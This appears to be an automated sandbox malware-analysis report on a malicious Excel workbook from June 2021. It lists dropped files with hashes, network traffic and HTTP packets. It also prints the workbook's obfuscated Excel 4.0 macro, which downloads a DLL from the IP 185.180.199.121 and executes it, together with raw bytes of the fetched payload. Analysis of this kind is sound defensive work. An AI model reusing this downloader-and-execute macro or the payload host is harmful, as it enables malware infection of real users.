Preview:	.U.N.0.._....E...t.....$..\{.X.K.....[z..AT6y9.1g...jaM....w-;kF..'..k...]..U..S.x.-[.......2.V.v.>.p.9......p.2..D...A...F.\z...:e.6...L..T.....Ip...W.e..i...9..j..!B0Z.D..7....l.%(/_-.i0D..{.dM..&...R.(p.f...D.94.,...O)...y.k...Z....Q+..EL..RZ\|a......f?I..b....).7V..o....5...=J.....~ ..#..\I!>...jdS...P..!..X&.n.^...Zh..ii...w+.C.........\|.>.CE.-.........z.> .......).]."..4l..-.Q.art.!Om.j.6/...?.......PK..........!.........f.......[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Total_order_data-V2434883.xlsb Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtt:RJ1
MD5:	7AB76C81182111AC93ACF915CA8331D5
SHA1:	68B94B5D4C83A6FB415C8026AF61F3F8745E2559
SHA-256:	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
SHA-512:	A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
Malicious:	true
Preview:	.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\kdldyeff.dll Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	525280
Entropy (8bit):	7.308601583725249
Encrypted:	false
SSDEEP:	6144:rCqCGToDHEHD7pPV25vyGOZYjbLvD6RVioO6gZ6xv4hCZWrVcXRYpmPBOA:uTGTGkn5gqufLvDcVzPR0kWA
MD5:	1E2385B6C669BA98831B97915F6ACEBA
SHA1:	A1966D5CEB273CC669C8D6829E2EC9E842D6E482
SHA-256:	337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702
SHA-512:	1780797924A0DD5D8E53C23CCFA2E5740BA2E58EC7E7BAEF3A362EACF7956B87D58AAF341DBF8F9F3B4B07853415404BB496DA039D448E43090478E07FFB3B00
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............A...A...A...A...A...A...A...A...A...AS..A...A...Ar..A...A"..A...Ar..A...Ar..A...ARich...A........................PE..L.....t`...........!.....@..................P............................... ......d...............................`...U............P...i...............#.......0...................................................P...............................text....7.......@.................. ..`.rdata.......P.......P..............@..@.data....c.......0..................@....rsrc....i...P...p..................@..@.reloc..._.......`..................@..B................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.870421965466312
TrID:	Excel Microsoft Office Binary workbook document (47504/1) 49.74% Excel Microsoft Office Open XML Format document (40004/1) 41.89% ZIP compressed archive (8000/1) 8.38%
File name:	Total_order_data-V2434883.xlsb
File size:	64436
MD5:	3ee5986d7978a5f2df982fce2a3ebf93
SHA1:	8f0e54b80cb391871d3cd1de6dd190ea686f0798
SHA256:	a0a165ea7db4685fb5677e3bc17c6d9ade7224dca824d9de930355f1c40ee0a2
SHA512:	cbdaee8e1928112bc0ef5fda78aebd6f3d9ce4fc389d3c743b3f3b73c0c7eaa067d3e32373fde81fd894c5b91acb89f33ad98b6a80a7b42c9565142b50764745
SSDEEP:	1536:Gj3yHgwWlMVGoIahaDHTU6hryF70liWWGH0AeWj:Gj3y02sTU2yF70liWW20a
File Content Preview:	PK..........!.L.......>.......[Content_Types].xml ...(.......................................................................................................................................................................................##................

File Icon


Icon Hash:	74f0d0d2c6d6d0f4

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "Total_order_data-V2434883.xlsb"

Indicators
Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

CALL(U, Sheet2!AV21&Sheet2!BM28&Sheet2!BK33&Sheet2!AX14, Sheet2!BJ54&Sheet2!BK54&Sheet2!BL54&BD46&BE46&BF46, 0, ht, ..\kdldyeff.dll, 0, 0)

"=CALL(BQ18&Sheet2!BK50&Sheet2!BL50&BD42&BE44&BF44,Sheet2!AV21&Sheet2!BM28&Sheet2!BK33&Sheet2!AX14,Sheet2!BJ54&Sheet2!BK54&Sheet2!BL54&BD46&BE46&BF46,0,BH28&BH29&BH30&BH31,BH41,0,0)",,,,,,,,,,,,,,,,,,,,,,=Sheet2!BA14(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,tp://,,,,,,,,,,,,,,,,,,,,,,185.180.199.121/sat1_0609_2.,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\kdldyeff.dll,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,C,B,B,,,,,,,,,,,

,,FileA,,,,,,,,,,,,,,,,,,,,=EXEC(before.3.13.47.sheet!BG59&before.3.13.47.sheet!BG60&before.3.13.47.sheet!BF23&Sheet1!BH41),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,"=RIGHT(""FDFGFDhfjhjhfjfgjUR"",2)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""2 -s """,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,LDownlo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,adTo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,J,J,C,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,regs,,,,,,,,,,,,,,,,,vr3,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2021 23:54:47.282743931 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.362811089 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.362973928 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.363862038 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.442996025 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.443046093 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.443085909 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.443161964 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.443187952 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.443205118 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.443222046 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.443228006 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.443283081 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.443494081 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.443536043 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.443573952 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.443579912 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.443603039 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.443612099 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.443649054 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.443680048 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.443743944 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.443783045 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.443820953 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.443856955 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.522511005 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.522572994 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.522655964 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.522720098 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.522938013 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.522991896 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523009062 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523045063 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523050070 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523106098 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523108959 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523169994 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523260117 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523308992 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523327112 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523354053 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523369074 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523406982 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523411989 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523459911 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523469925 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523514032 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523514032 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523575068 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523580074 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523621082 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523637056 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523677111 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523682117 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523729086 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523736954 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523766994 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523785114 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523806095 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523821115 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523845911 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523865938 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523883104 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.523905039 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.523938894 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.600703955 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.600749969 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.600863934 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.600924015 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.601037025 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.601088047 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.601097107 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.601146936 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.601836920 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.601905107 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.601933956 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.601999044 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.602040052 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.602092981 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.602149010 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.602231026 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.602251053 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.602309942 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.602421045 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.602483988 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.602510929 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.602576017 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.602621078 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.602678061 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.602688074 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.602741003 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.602749109 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.602797031 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.602797985 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.602852106 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.602880001 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.602927923 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.602933884 CEST	49719	80	192.168.2.3	185.180.199.121
Jun 9, 2021 23:54:47.602982998 CEST	80	49719	185.180.199.121	192.168.2.3
Jun 9, 2021 23:54:47.602987051 CEST	49719	80	192.168.2.3	185.180.199.121

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2021 23:54:32.001111984 CEST	53	55984	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:32.795409918 CEST	64185	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:32.845593929 CEST	53	64185	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:33.770195961 CEST	65110	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:33.823190928 CEST	53	65110	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:34.719290972 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:34.779447079 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:35.495938063 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:35.551264048 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:36.295209885 CEST	60831	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:36.348037958 CEST	53	60831	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:37.534324884 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:37.588934898 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:40.942732096 CEST	53195	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:41.001425028 CEST	53	53195	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:43.446211100 CEST	50141	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:43.496730089 CEST	53	50141	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:44.360688925 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:44.419414043 CEST	49563	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:44.449712992 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:44.469897985 CEST	53	49563	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:44.938147068 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:45.012216091 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:45.964745045 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:46.038683891 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:47.011648893 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:47.071829081 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:47.287636042 CEST	59349	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:47.337920904 CEST	53	59349	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:48.383496046 CEST	57084	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:48.441927910 CEST	53	57084	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:49.073967934 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:49.135250092 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:49.257913113 CEST	58823	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:49.316227913 CEST	53	58823	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:50.444689035 CEST	57568	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:50.494801998 CEST	53	57568	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:51.427377939 CEST	50540	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:51.480588913 CEST	53	50540	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:52.300318956 CEST	54366	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:52.351444006 CEST	53	54366	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:53.121059895 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:53.179208994 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:56.914474010 CEST	53034	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:56.967276096 CEST	53	53034	8.8.8.8	192.168.2.3
Jun 9, 2021 23:54:57.824922085 CEST	57762	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:54:57.884726048 CEST	53	57762	8.8.8.8	192.168.2.3
Jun 9, 2021 23:55:09.354513884 CEST	55435	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:55:09.425384045 CEST	53	55435	8.8.8.8	192.168.2.3
Jun 9, 2021 23:55:28.075978994 CEST	50713	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:55:28.127548933 CEST	53	50713	8.8.8.8	192.168.2.3
Jun 9, 2021 23:55:40.689970016 CEST	56132	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:55:40.764213085 CEST	53	56132	8.8.8.8	192.168.2.3
Jun 9, 2021 23:55:41.756185055 CEST	58987	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:55:41.826765060 CEST	53	58987	8.8.8.8	192.168.2.3
Jun 9, 2021 23:55:59.762665033 CEST	56579	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:55:59.823335886 CEST	53	56579	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:00.696613073 CEST	60633	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:00.755624056 CEST	53	60633	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:00.841264963 CEST	61292	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:00.899986029 CEST	53	61292	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:01.894507885 CEST	63619	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:01.958168030 CEST	53	63619	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:02.884604931 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:02.946110010 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:03.897176981 CEST	61946	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:03.949732065 CEST	53	61946	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:04.905435085 CEST	64910	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:04.967329979 CEST	53	64910	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:05.886230946 CEST	52123	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:05.939667940 CEST	53	52123	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:07.252216101 CEST	56130	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:07.312077045 CEST	53	56130	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:08.590249062 CEST	56338	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:08.649384022 CEST	53	56338	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:09.563621044 CEST	59420	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:09.623941898 CEST	53	59420	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:18.801214933 CEST	58784	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:18.859745026 CEST	53	58784	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:20.518312931 CEST	63978	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:20.580265045 CEST	53	63978	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:24.769253016 CEST	62938	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:24.831938982 CEST	53	62938	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:54.407386065 CEST	55708	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:54.468580961 CEST	53	55708	8.8.8.8	192.168.2.3
Jun 9, 2021 23:56:56.068453074 CEST	56803	53	192.168.2.3	8.8.8.8
Jun 9, 2021 23:56:56.128381014 CEST	53	56803	8.8.8.8	192.168.2.3

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 9, 2021 23:55:40.764213085 CEST	8.8.8.8	192.168.2.3	0x3fe5	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

185.180.199.121

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49719	185.180.199.121	80	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2021 23:54:47.363862038 CEST	1098	OUT	GET /sat1_0609_2.dll HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 185.180.199.121 Connection: Keep-Alive
Jun 9, 2021 23:54:47.443046093 CEST	1100	IN	HTTP/1.1 200 OK Date: Wed, 09 Jun 2021 21:54:41 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28 Last-Modified: Wed, 09 Jun 2021 20:56:10 GMT ETag: "803e0-5c45b81110e80" Accept-Ranges: bytes Content-Length: 525280 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de a0 b9 12 9a c1 d7 41 9a c1 d7 41 9a c1 d7 41 cc de c4 41 bf c1 d7 41 9a c1 d7 41 a2 c1 d7 41 f8 de c4 41 89 c1 d7 41 9a c1 d6 41 53 c0 d7 41 19 dd d9 41 81 c1 d7 41 72 de dd 41 16 c1 d7 41 22 c7 d1 41 9b c1 d7 41 72 de dc 41 c7 c1 d7 41 72 de d3 41 9b c1 d7 41 52 69 63 68 9a c1 d7 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 93 84 74 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 40 02 00 00 d0 05 00 00 00 00 00 d9 bd 00 00 00 10 00 00 00 50 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 10 00 00 64 dd 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 db 02 00 55 00 00 00 b8 c0 02 00 f0 00 00 00 00 50 03 00 b8 69 04 00 00 00 00 00 00 00 00 00 00 e0 07 00 e0 23 00 00 00 c0 07 00 b8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a7 37 02 00 00 10 00 00 00 40 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b5 8b 00 00 00 50 02 00 00 90 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e8 63 00 00 00 e0 02 00 00 30 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 69 04 00 00 50 03 00 00 70 04 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d2 5f 00 00 00 c0 07 00 00 60 00 00 00 80 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 